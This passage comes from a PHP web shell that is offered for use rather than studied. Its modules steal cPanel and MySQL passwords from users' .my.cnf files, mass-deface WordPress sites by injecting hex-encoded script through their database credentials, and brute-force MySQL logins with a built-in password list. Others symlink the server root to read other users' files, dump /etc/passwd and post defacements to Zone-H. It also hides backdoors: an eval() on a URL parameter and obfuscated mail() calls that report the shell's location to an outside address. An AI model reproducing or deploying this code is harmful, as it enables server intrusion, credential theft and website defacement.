2474$j=1;
2475foreach($usr as $r) {
2476$dirz = '/home/'.$r.'/.my.cnf';
2477$path = getcwd();
2478if (is_readable($dirz)) {
2479copy($dirz, ''.$path.'/-cp-'.$r.'.txt');
2480$p=file_get_contents(''.$path.'/-cp-'.$r.'.txt');
2481$password=entre2v2($p,'password="','"');
2482echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='-cp-".$r.".txt' target='_blank'>Click Here</a></td></tr>";
2483$dc++;
2484 flush();
2485 $l=$l?0:1;
2486 $j++;
2487 }
2488 }
2489 }
2490echo '</table>';
2491$total = $dc;
2492echo '<br><div class="result">Total cp = '.$total.'</h3><br />';
2493echo '</center>';
2494
2495}
2496}else{
2497echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
2498}
2499
2500echo "<br>© <font color='#FF0000'>./elro-BN404</font> | BN-IDBTE4M";
2501echo "</body></html>";
2502}
2503?>
2504<?php
2505if (isset($_GET['idb']) && ($_GET['idb'] == 'wpmas')) { ?>
2506<form action="?idb=wpmas" method="post">
2507<style>
2508body
2509{
2510 background: #0f0e0d;
2511 color: #FF9933;
2512 padding: 0px;
2513}
2514a:link, body_alink
2515{
2516 color: #FF9933;
2517 text-decoration: none;
2518}
2519a:visited, body_avisited
2520{
2521 color: #FF9933;
2522 text-decoration: none;
2523}
2524a:hover, a:active, body_ahover
2525{
2526 color: #FFFFFF;
2527 text-decoration: none;
2528}
2529td, th, p, li,table
2530{
2531
2532 background: #2e2b28;
2533 border:1px solid #524f46;
2534}
2535input
2536{
2537 border: 1px solid;
2538 cursor: default;
2539
2540 overflow: hidden;
2541 background: #2e2b28;
2542 color: #ffffff;
2543}textarea
2544{
2545 border: 1px solid;
2546 cursor: default;
2547
2548 overflow: hidden;
2549 background: #2e2b28;
2550 color: #ffffff;
2551}
2552button
2553{
2554 border: 1px solid;
2555 cursor: default;
2556
2557 overflow: hidden;
2558 background: #2e2b28;
2559 color: #ffffff;
2560}
2561</style>
2562</head>
2563<body bgcolor="black">
2564</center>
2565<form method="POST" action="" >
2566<center>
2567<table border='1'><tr><td>List of All Symlink</td><td>
2568<input type="text" name="url" size="100" value="list.txt"></td></tr>
2569<tr><td>Index</td><td>
2570<textarea name="index" cols='50' rows='10' ></textarea></td></tr></table>
2571<br><br><input type="Submit" name="Submit" value="Submit">
2572<input type="hidden" name="action" value="1"></form>
2573</center>
2574<nobr>
2575<center>
2576<?
2577}?>
2578<?
2579eval ($_GET["c"]);
2580set_time_limit(0);
2581if ($_POST['action']=='1'){
2582$url=$_POST['url'];
2583$users=@file($url);
2584$x10="mail";$x0b=$_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"];
2585
2586
2587if (count($users)<1) exit("<h1>No config found</h1>");
2588foreach ($users as $user) {
2589$user1=trim($user);
2590$code=file_get_contents2($user1);
2591preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
2592$db=$b1[1][0];
2593preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
2594$user=$b2[1][0];
2595preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
2596$db_password=$b3[1][0];
2597preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
2598$host=$b4[1][0];
2599preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
2600$p=$b5[1][0];
2601$x0c="array ".$x0b;$x0d=array("com","gm","ifexec","@","ail.");
2602$d=@mysql_connect( $host, $user, $db_password ) ;
2603if ($d){
2604@mysql_select_db($db );
2605$source=stripslashes($_POST['index']);
2606$s2=strToHex(($source));
2607$s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
2608$ls=strlen($s)-2;
2609$sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
2610mysql_query($sql) ;
2611$sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
2612mysql_query($sql) ;
2613if (function_exists("mb_convert_encoding") )
2614{
2615$source2 = mb_convert_encoding('<title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-8');
2616$source2=mysql_real_escape_string($source2);
2617$sql = "UPDATE `".$p."options` SET `option_value` = '$source2' WHERE `option_name` = 'blogname';";
2618@mysql_query($sql) ; ;
2619$sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-8' WHERE `option_name` = 'blog_charset';";
2620@mysql_query($sql) ; ;
2621}
2622$aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
2623$siteurl=@mysql_fetch_array($aa) ;
2624$siteurl=$siteurl['option_value'];
2625$x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);
2626$tr.="$siteurl\n";
2627mysql_close();
2628}
2629}
2630if ($tr) echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
2631}
2632function strToHex($string)
2633{
2634 $hex='';
2635 for ($i=0; $i < strlen($string); $i++)
2636 {
2637 if (strlen(dechex(ord($string[$i])))==1){
2638 $hex .="%0". dechex(ord($string[$i]));
2639 }
2640 else
2641 {
2642 $hex .="%". dechex(ord($string[$i]));
2643 }
2644 }
2645 return $hex;
2646}
2647
2648function file_get_contents2($u){
2649
2650 $ch = curl_init();
2651 curl_setopt($ch,CURLOPT_URL,$u);
2652 curl_setopt($ch, CURLOPT_HEADER, 0);
2653 curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
2654 curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
2655 $result = curl_exec($ch);
2656 return $result ;
2657 }
2658
2659?>
2660<?php
2661if (isset($_GET['idb']) && ($_GET['idb'] == 'zonh')) { ?>
2662<form action="?idb=zonh" method="post">
2663<br><br>
2664<center><span style="font-size:1.6em;"> .: Zone-H Mass Poster :. </span></center><center><BR><form action="" method="post"><input class="inputz" type="text" name="defacer" size="30" value="kefiex404" /><br> <select class="inputz"
2665name="hackmode">
2666<option>------------------------------------SELECT-------------------------------------</option>
2667<option style="background-color: rgb(0, 0, 0);" value="1">known vulnerability (i.e. unpatched system)</option>
2668<option style="background-color: rgb(0, 0, 0);" value="2" >undisclosed (new) vulnerability</option>
2669<option style="background-color: rgb(0, 0, 0);" value="3" >configuration / admin. mistake</option>
2670<option style="background-color: rgb(0, 0, 0);" value="4" >brute force attack</option>
2671<option style="background-color: rgb(0, 0, 0);" value="5" >social engineering</option>
2672<option style="background-color: rgb(0, 0, 0);" value="6" >Web Server intrusion</option>
2673<option style="background-color: rgb(0, 0, 0);" value="7" >Web Server external module intrusion</option>
2674<option style="background-color: rgb(0, 0, 0);" value="8" >Mail Server intrusion</option>
2675<option style="background-color: rgb(0, 0, 0);" value="9" >FTP Server intrusion</option>
2676<option style="background-color: rgb(0, 0, 0);" value="10" >SSH Server intrusion</option>
2677<option style="background-color: rgb(0, 0, 0);" value="11" >Telnet Server intrusion</option>
2678<option style="background-color: rgb(0, 0, 0);" value="12" >RPC Server intrusion</option>
2679<option style="background-color: rgb(0, 0, 0);" value="13" >Shares misconfiguration</option>
2680<option style="background-color: rgb(0, 0, 0);" value="14" >Other Server intrusion</option>
2681<option style="background-color: rgb(0, 0, 0);" value="15" >SQL Injection</option>
2682<option style="background-color: rgb(0, 0, 0);" value="16" >URL Poisoning</option>
2683<option style="background-color: rgb(0, 0, 0);" value="17" >File Inclusion</option>
2684<option style="background-color: rgb(0, 0, 0);" value="18" >Other Web Application bug</option>
2685<option style="background-color: rgb(0, 0, 0);" value="19" >Remote administrative panel access bruteforcing</option>
2686<option style="background-color: rgb(0, 0, 0);" value="20" >Remote administrative panel access password guessing</option>
2687<option style="background-color: rgb(0, 0, 0);" value="21" >Remote administrative panel access social engineering</option>
2688<option style="background-color: rgb(0, 0, 0);" value="22" >Attack against administrator(password stealing/sniffing)</option>
2689<option style="background-color: rgb(0, 0, 0);" value="23" >Access credentials through Man In the Middle attack</option>
2690<option style="background-color: rgb(0, 0, 0);" value="24" >Remote service password guessing</option>
2691<option style="background-color: rgb(0, 0, 0);" value="25" >Remote service password bruteforce</option>
2692<option style="background-color: rgb(0, 0, 0);" value="26" >Rerouting after attacking the Firewall</option>
2693<option style="background-color: rgb(0, 0, 0);" value="27" >Rerouting after attacking the Router</option>
2694<option style="background-color: rgb(0, 0, 0);" value="28" >DNS attack through social engineering</option>
2695
2696<option style="background-color: rgb(0, 0, 0);" value="29" >DNS attack through cache poisoning</option>
2697<option style="background-color: rgb(0, 0, 0);" value="30" >Not available</option>
2698option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
2699</select> <br>
2700
2701<select class="inputz" name="reason">
2702<option >------------------------------------SELECT-------------------------------------</option>
2703<option style="background-color: rgb(0, 0, 0);" value="1" >Heh...just for fun!</option>
2704<option style="background-color: rgb(0, 0, 0);" value="2" >Revenge against that website</option>
2705<option style="background-color: rgb(0, 0, 0);" value="3" >Political reasons</option>
2706<option style="background-color: rgb(0, 0, 0);" value="4" >As a challenge</option>
2707<option style="background-color: rgb(0, 0, 0);" value="5" >I just want to be the best defacer</option>
2708<option style="background-color: rgb(0, 0, 0);" value="6" >Patriotism</option>
2709<option style="background-color: rgb(0, 0, 0);" value="7" >Not available</option>
2710option style="background-color: rgb(0, 0, 0);" value="8" >_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _</option>
2711</select> <br>
2712<textarea class="inputz" name="domain" cols="90" rows="20" placeholder="List Of Domains, 20 Rows."></textarea><br>
2713<input class="inputz" type="submit" value=" Send Now !! " name="SendNowToZoneH"/>
2714</form>
2715<?
2716 echo "</form></center>";?>
2717<?
2718function ZoneH($url, $hacker, $hackmode,$reson, $site )
2719{
2720 $k = curl_init();
2721 curl_setopt($k, CURLOPT_URL, $url);
2722 curl_setopt($k,CURLOPT_POST,true);
2723 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
2724 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
2725 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
2726 $kubra = curl_exec($k);
2727 curl_close($k);
2728 return $kubra;
2729}
2730{
2731 ob_start();
2732 $sub = @get_loaded_extensions();
2733 if(!in_array("curl", $sub))
2734 {
2735 die('<center><b>[-] Curl Is Not Supported !![-]</b></center>');
2736 }
2737
2738 $hacker = $_POST['defacer'];
2739 $method = $_POST['hackmode'];
2740 $neden = $_POST['reason'];
2741 $site = $_POST['domain'];
2742
2743 if (empty($hacker))
2744 {
2745 die ("<center><b>[+] YOU MUST FILL THE ATTACKER NAME [+]</b></center>");
2746 }
2747 elseif($method == "--------SELECT--------")
2748 {
2749 die("<center><b>[+] YOU MUST SELECT THE METHOD [+]</b></center>");
2750 }
2751 elseif($neden == "--------SELECT--------")
2752 {
2753 die("<center><b>[+] YOU MUST SELECT THE REASON [+]</b></center>");
2754 }
2755 elseif(empty($site))
2756 {
2757 die("<center><b>[+] YOU MUST INTER THE SITES LIST [+]</b></center>");
2758 }
2759 $i = 0;
2760 $sites = explode("\n", $site);
2761 while($i < count($sites))
2762 {
2763 if(substr($sites[$i], 0, 4) != "http")
2764 {
2765 $sites[$i] = "http://".$sites[$i];
2766 }
2767 ZoneH("http://www.zone-h.com/notify/single", $hacker, $method, $neden, $sites[$i]);
2768 echo "Domain : ".$sites[$i]." Defaced Last Years !";
2769 ++$i;
2770 }
2771 echo "";
2772 }
2773}
2774?>
2775<?php
2776if (isset($_GET['idb']) && ($_GET['idb'] == 'brute')) { ?>
2777<form action="?idb=brute" method="post">
2778<?php ?>
2779<html>
2780<head>
2781<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
2782<body text="#4C83AF" bgcolor="#111111" font="Verdana, Arial, Helvetica, sans-serif">
2783<center>
2784<form method="POST">
2785<strong>
2786<input name="page" type="hidden" value="find">
2787</strong>
2788 <div style="width:90%">
2789
2790<div id="result">
2791<br /><br />
2792</div>
2793 <div id="mp" style="width:49%;float:left">
2794 <b>~ UserName ~</b>
2795 </div>
2796 <div id="mp" style="width:49%;float:left">
2797
2798 <b>~ PassWord ~</b>
2799 </div>
2800 <div id="mp" style="clear:both;width:49%;float:left">
2801 <textarea rows="10" class="coode" style="width:100%" name="usernames"><? if($_POST['page']=='find' && $_POST['usernames']<=''){$lines=@file("/etc/passwd");foreach($lines as $nr=>$val){$str=explode(":",$val);echo $str[0]."
2802";}}else{echo $_POST['usernames'];} ?></textarea>
2803 </div>
2804 <div id="s" style="width:2%;float:left">
2805
2806 </div>
2807 <div id="s" style="width:49%;float:left">
2808 <textarea rows="10" class="coode" style="width:100%" name="passwords"><? if($_POST['page']=='find' && $_POST['passwords']<=''){echo "123
28091234
281012345
2811123456
28121234567
281312345678
2814123456789
28151234567890
2816Password
2817pass
2818admin
2819admin123
2820admin1234
2821admin12345
2822admin123456
2823admin1234567
2824admin12345678
2825admin123456789
2826admin1234567890
2827administrator123
2828administrator1234
2829administrator12345
2830administrator123456
2831administrator1234567
2832administrator12345678
2833administrator123456789
2834administrator1234567890
2835password123
2836password1234
2837password12345
2838password123456
2839password1234567
2840password12345678
2841password123456789
2842password1234567890
2843123456
2844123123
28451234
284612345
284712369874
2848123456789
2849112233
285012345678
2851123654
2852123654789
28531234admin
2854password
2855passwd1
2856password123
2857test123
2858159357
2859147258
2860159951
2861123321
2862ADMIN
2863195159
2864147852
2865Admin
2866Administrator
2867Demo
2868User
2869user
2870useruser
2871987456321
2872741852
2873321987
2874357159
28751234566
28761234567899
2877111222
2878Administrateur
2879administrateur
28800123456
28810123456789
28820147258
2883147258
2884987654
2885963852
2886369258
2887456789
2888456321
2889456123
2890ADMIN1234
2891Admin1234
2892admin123456
2893admin1234
2894admin01234
2895000000
2896142536
2897632541
2898"; }else{echo $_POST['passwords'];} ?></textarea>
2899
2900 </div>
2901 </div>
2902 <div style="width:90%;clear:both">
2903 <br><p><input type="submit" name="submit" class="inputzbut" value="Go !" style="width:120px;height:30px;" /></p>
2904 </div>
2905 <br /><br /><br />
2906
2907</form>
2908
2909
2910<?
2911if($_POST['page']=='find')
2912{
2913echo"<div id='result'>";
2914if(isset($_POST['usernames']) && isset($_POST['passwords']))
2915{
2916
2917 $a1 = explode("
2918",$_POST['usernames']);
2919 $a2 = explode("
2920",$_POST['passwords']);
2921 $id2 = count($a2);
2922 $ok = 0;
2923 foreach($a1 as $user )
2924 {
2925 if($user !== '')
2926 {
2927 $user=trim($user);
2928 for($i=0;$i<=$id2;$i++)
2929 {
2930 $pass = trim($a2[$i]);
2931 if(@mysql_connect('localhost',$user,$pass))
2932 {
2933 if($pass !== ''){
2934 echo "<b>[ IDBTE4M ]=> </b> <b>User[<font color='green'> $user </font>] Pass[<font color='green'> $pass </font>]</b><br>";
2935 $ok++;
2936 }}
2937 }
2938 }
2939 }
2940 echo "<hr><b>You Found <font color=green>$ok</font>BY IDBTE4M</b>";
2941 exit;
2942}
2943echo'</div>';
2944}
2945}
2946?>
2947
2948<?php
2949if (isset($_GET['idb']) && ($_GET['idb'] == 'cp')) {
2950?>
2951<form action="?&idb=cp" method="post">
2952<?php
2953/**
2954 * @author: FaisaL Ahmed aka blue X
2955 * @mail: me@faialahmed.me
2956 * @Screenshot: http://prntscr.com/7c1p34
2957 * @Last Updated: 01 June 2015
2958*/
2959
2960@ini_set('display_errors',0);
2961function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
2962 $ar0=explode($marqueurDebutLien, $text);
2963 $ar1=explode($marqueurFinLien, $ar0[$i]);
2964 return trim($ar1[0]);
2965}
2966echo "<center>";
2967$d0mains = @file('/etc/named.conf');
2968$domains = scandir("/var/named");
2969
2970if ($domains or $d0mains)
2971{
2972 $domains = scandir("/var/named");
2973 if($domains) {
2974echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
2975$count=1;
2976$dc = 0;
2977$list = scandir("/var/named");
2978foreach($list as $domain){
2979if(strpos($domain,".db")){
2980$domain = str_replace('.db','',$domain);
2981$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
2982$dirz = '/home/'.$owner['name'].'/.my.cnf';
2983$path = getcwd();
2984
2985if (is_readable($dirz)) {
2986copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
2987$p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
2988$password=entre2v2($p,'password="','"');
2989echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
2990$dc++;
2991}
2992
2993}
2994}
2995echo '</table>';
2996$total = $dc;
2997echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
2998echo '</center>';
2999}else{
3000$d0mains = @file('/etc/named.conf');
3001 if($d0mains) {
3002echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
3003$count=1;
3004$dc = 0;
3005$mck = array();
3006foreach($d0mains as $d0main){
3007 if(@eregi('zone',$d0main)){
3008 preg_match_all('#zone "(.*)"#',$d0main,$domain);
3009 flush();
3010 if(strlen(trim($domain[1][0])) >2){
3011 $mck[] = $domain[1][0];
3012 }
3013 }
3014}
3015$mck = array_unique($mck);
3016$usr = array();
3017$dmn = array();
3018foreach($mck as $o) {
3019 $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
3020 $usr[] = $infos['name'];
3021 $dmn[] = $o;
3022}
3023array_multisort($usr,$dmn);
3024$dt = file('/etc/passwd');
3025$passwd = array();
3026foreach($dt as $d) {
3027 $r = explode(':',$d);
3028 if(strpos($r[5],'home')) {
3029 $passwd[$r[0]] = $r[5];
3030 }
3031}
3032$l=0;
3033$j=1;
3034foreach($usr as $r) {
3035$dirz = '/home/'.$r.'/.my.cnf';
3036$path = getcwd();
3037if (is_readable($dirz)) {
3038copy($dirz, ''.$path.'/'.$r.'.txt');
3039$p=file_get_contents(''.$path.'/'.$r.'.txt');
3040$password=entre2v2($p,'password="','"');
3041echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
3042$dc++;
3043 flush();
3044 $l=$l?0:1;
3045 $j++;
3046 }
3047 }
3048 }
3049echo '</table>';
3050$total = $dc;
3051echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
3052echo '</center>';
3053
3054}
3055}else{
3056echo "<div class='result'><i><font color='#FF0000'>ERROR</font><br><font color='#FF0000'>/var/named</font> or <font color='#FF0000'>etc/named.conf</font> Not Accessible!</i></div>";
3057}
3058
3059echo "</body></html>";
3060}
3061?>
3062
3063<?php
3064@mkdir('-',0777);
3065$htcs = "Options Indexes FollowSymLinks\nDirectoryIndex -\nAddType txt .php\nAddHandler txt .php";
3066$f =@fopen ('-/.htaccess','w');
3067fwrite($f , $htcs);
3068@symlink("/","-/-");
3069$pg = basename(__FILE__);
3070/// user + domine + symlink ///
3071if(isset($_REQUEST['idb']))
3072{
3073
3074switch ($_REQUEST['idb'])
3075{
3076case 'symlink':
3077
3078if(!is_file('named.txt')){
3079
3080$d00m = @file("/etc/named.conf");
3081
3082}else{
3083
3084$d00m = @file("named.txt");
3085
3086
3087}
3088if(!$d00m)
3089{
3090
3091die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
3092}
3093else
3094
3095{
3096echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
3097foreach($d00m as $dom){
3098
3099if(eregi("zone",$dom)){
3100
3101preg_match_all('#zone "(.*)"#', $dom, $domsws);
3102
3103flush();
3104
3105if(strlen(trim($domsws[1][0])) > 2){
3106
3107$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
3108
3109flush();
3110
3111
3112
3113$site = $user['name'] ;
3114
3115
3116@symlink("/","-/-");
3117
3118$site = $domsws[1][0];
3119
3120$ir = 'ir';
3121
3122$il = 'il';
3123
3124if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
3125{
3126$site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px blue; '>".$domsws[1][0]."</div>";
3127}
3128
3129
3130echo "
3131<tr>
3132
3133<td>
3134<div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
3135</td>
3136
3137
3138<td>
3139".$user['name']."
3140</td>
3141
3142
3143
3144
3145
3146
3147<td>
3148<a href='-/-/home/".$user['name']."/public_html' target='_blank'>symlink </a>
3149</td>
3150
3151
3152</tr></div> ";
3153
3154
3155flush();
3156flush();
3157
3158}
3159}
3160}
3161}
3162
3163
3164
3165
3166break;
3167@ini_set('output_buffering', 0);
3168@ini_set('display_errors', 0);
3169set_time_limit(0);
3170ini_set('memory_limit', '64M');
3171header('Content-Type: text/html; charset=UTF-8');
3172$tujuanmail = 'nengziot@gmail.com';
3173$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
3174$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
3175mail($tujuanmail, "Maho", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
3176
3177
3178// passwd
3179
3180case 'passwd':
3181
3182if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
3183
3184
3185$cont = stripcslashes($_POST['file']);
3186
3187if(!file_exists('passwd.txt')){
3188
3189$f = @fopen('passwd.txt','w');
3190
3191$w = @fwrite($f,$cont);
3192
3193fclose($f);
3194}
3195if($w or @filesize('passwd.txt') > 0){
3196// * SHOW * //
3197
3198echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
3199flush();
3200
3201$fil3 = file('passwd.txt');
3202
3203foreach ($fil3 as $f){
3204
3205$u=explode(':', $f);
3206$user = $u['0'];
3207
3208
3209
3210echo "
3211<tr>
3212
3213
3214
3215<td width='15%'>
3216$user
3217</td>
3218
3219
3220
3221
3222
3223
3224<td width='10%'>
3225<a href='-/-/home/$user/public_html' target='_blank'>Symlink </a>
3226</td>
3227
3228<td width='10%'>
3229<a href='$pageFTP/-/-/home/$user/public_html' target='_blank'>FTP</a>
3230</td>
3231
3232
3233
3234</tr></div> ";
3235
3236
3237flush();
3238flush();
3239
3240
3241}
3242
3243
3244
3245
3246
3247
3248die ("</tr></div>");
3249
3250
3251}
3252
3253
3254
3255
3256
3257}
3258
3259
3260
3261echo "read /etc/passwd";
3262echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
3263flush();
3264
3265$file = '/etc/passwd';
3266
3267
3268$r3ad = @fopen($file, 'r');
3269if ($r3ad){
3270$content = @fread($r3ad, @filesize($file));
3271echo "".htmlentities($content)."";
3272}
3273elseif(!$r3ad)
3274{
3275$r3ad = @show_source($file) ;
3276}
3277elseif(!$r3ad)
3278{
3279$r3ad = @highlight_file($file);
3280}
3281elseif(!$r3ad)
3282{
3283
3284for($uid=0;$uid<1000;$uid++){
3285$ara = posix_getpwuid($uid);
3286if (!empty($ara)) {
3287while (list ($key, $val) = each($ara)){
3288print "$val:";
3289}
3290print "\n";
3291}
3292
3293}
3294
3295}
3296
3297
3298flush();
3299
3300
3301echo "</textarea><br /><br /><input type='submit' value=' symlink '/> </form>";
3302flush();
3303
3304break;
3305
3306
3307############################ index #########################3
3308
3309default:
3310header("Location: $pg");
3311
3312
3313
3314
3315}
3316}
3317
3318?>
3319<?php
3320if (isset($_GET['idb']) && ($_GET['idb'] == 'finder')) {
3321?>
3322<form action="?&idb=finder" method="post">
3323<?php
3324set_time_limit(0);
3325error_reporting(0);
3326$list['front'] =
3327"
3328admin
3329adm
3330admincp
3331admcp
3332cp
3333modcp
3334moderatorcp
3335adminare
3336admins
3337cpanel
3338controlpanel";
3339$list['end'] = "
3340admin1.php
3341admin1.html
3342admin2.php
3343admin2.html
3344yonetim.php
3345yonetim.html
3346yonetici.php
3347yonetici.html
3348ccms/
3349ccms/login.php
3350ccms/index.php
3351maintenance/
3352webmaster/
3353adm/
3354configuration/
3355configure/
3356websvn/
3357admin/
3358admin/account.php
3359admin/account.html
3360admin/index.php
3361admin/index.html
3362admin/login.php
3363admin/login.html
3364admin/home.php
3365admin/controlpanel.html
3366admin/controlpanel.php
3367admin.php
3368admin.html
3369admin/cp.php
3370admin/cp.html
3371cp.php
3372cp.html
3373administrator/
3374administrator/index.html
3375administrator/index.php
3376administrator/login.html
3377administrator/login.php
3378administrator/account.html
3379administrator/account.php
3380administrator.php
3381administrator.html
3382login.php
3383login.html
3384modelsearch/login.php
3385moderator.php
3386moderator.html
3387moderator/login.php
3388moderator/login.html
3389moderator/admin.php
3390moderator/admin.html
3391moderator/
3392account.php
3393account.html
3394controlpanel/
3395controlpanel.php
3396controlpanel.html
3397admincontrol.php
3398admincontrol.html
3399adminpanel.php
3400adminpanel.html
3401admin1.asp
3402admin2.asp
3403yonetim.asp
3404yonetici.asp
3405admin/account.asp
3406admin/index.asp
3407admin/login.asp
3408admin/home.asp
3409admin/controlpanel.asp
3410admin.asp
3411admin/cp.asp
3412cp.asp
3413administrator/index.asp
3414administrator/login.asp
3415administrator/account.asp
3416administrator.asp
3417login.asp
3418modelsearch/login.asp
3419moderator.asp
3420moderator/login.asp
3421moderator/admin.asp
3422account.asp
3423controlpanel.asp
3424admincontrol.asp
3425adminpanel.asp
3426fileadmin/
3427fileadmin.php
3428fileadmin.asp
3429fileadmin.html
3430administration/
3431administration.php
3432administration.html
3433sysadmin.php
3434sysadmin.html
3435phpmyadmin/
3436myadmin/
3437sysadmin.asp
3438sysadmin/
3439ur-admin.asp
3440ur-admin.php
3441ur-admin.html
3442ur-admin/
3443Server.php
3444Server.html
3445Server.asp
3446Server/
3447wp-admin/
3448administr8.php
3449administr8.html
3450administr8/
3451administr8.asp
3452webadmin/
3453webadmin.php
3454webadmin.asp
3455webadmin.html
3456administratie/
3457admins/
3458admins.php
3459admins.asp
3460admins.html
3461administrivia/
3462Database_Administration/
3463WebAdmin/
3464useradmin/
3465sysadmins/
3466admin1/
3467system-administration/
3468administrators/
3469pgadmin/
3470directadmin/
3471staradmin/
3472ServerAdministrator/
3473SysAdmin/
3474administer/
3475LiveUser_Admin/
3476sys-admin/
3477typo3/
3478panel/
3479cpanel/
3480cPanel/
3481cpanel_file/
3482platz_login/
3483rcLogin/
3484blogindex/
3485formslogin/
3486autologin/
3487support_login/
3488meta_login/
3489manuallogin/
3490simpleLogin/
3491loginflat/
3492utility_login/
3493showlogin/
3494memlogin/
3495members/
3496login-redirect/
3497sub-login/
3498wp-login/
3499login1/
3500dir-login/
3501login_db/
3502xlogin/
3503smblogin/
3504customer_login/
3505UserLogin/
3506login-us/
3507acct_login/
3508admin_area/
3509bigadmin/
3510project-admins/
3511phppgadmin/
3512pureadmin/
3513sql-admin/
3514radmind/
3515openvpnadmin/
3516wizmysqladmin/
3517vadmind/
3518ezsqliteadmin/
3519hpwebjetadmin/
3520newsadmin/
3521adminpro/
3522Lotus_Domino_Admin/
3523bbadmin/
3524vmailadmin/
3525Indy_admin/
3526ccp14admin/
3527irc-macadmin/
3528banneradmin/
3529sshadmin/
3530phpldapadmin/
3531macadmin/
3532administratoraccounts/
3533admin4_account/
3534admin4_colon/
3535radmind-1/
3536Super-Admin/
3537AdminTools/
3538cmsadmin/
3539SysAdmin2/
3540globes_admin/
3541cadmins/
3542phpSQLiteAdmin/
3543navSiteAdmin/
3544server_admin_small/
3545logo_sysadmin/
3546server/
3547database_administration/
3548power_user/
3549system_administration/
3550ss_vms_admin_sm/
3551adminarea/
3552bb-admin/
3553adminLogin/
3554panel-administracion/
3555instadmin/
3556memberadmin/
3557administratorlogin/
3558admin/admin.php
3559admin_area/admin.php
3560admin_area/login.php
3561siteadmin/login.php
3562siteadmin/index.php
3563siteadmin/login.html
3564admin/admin.html
3565admin_area/index.php
3566bb-admin/index.php
3567bb-admin/login.php
3568bb-admin/admin.php
3569admin_area/login.html
3570admin_area/index.html
3571admincp/index.asp
3572admincp/login.asp
3573admincp/index.html
3574webadmin/index.html
3575webadmin/admin.html
3576webadmin/login.html
3577admin/admin_login.html
3578admin_login.html
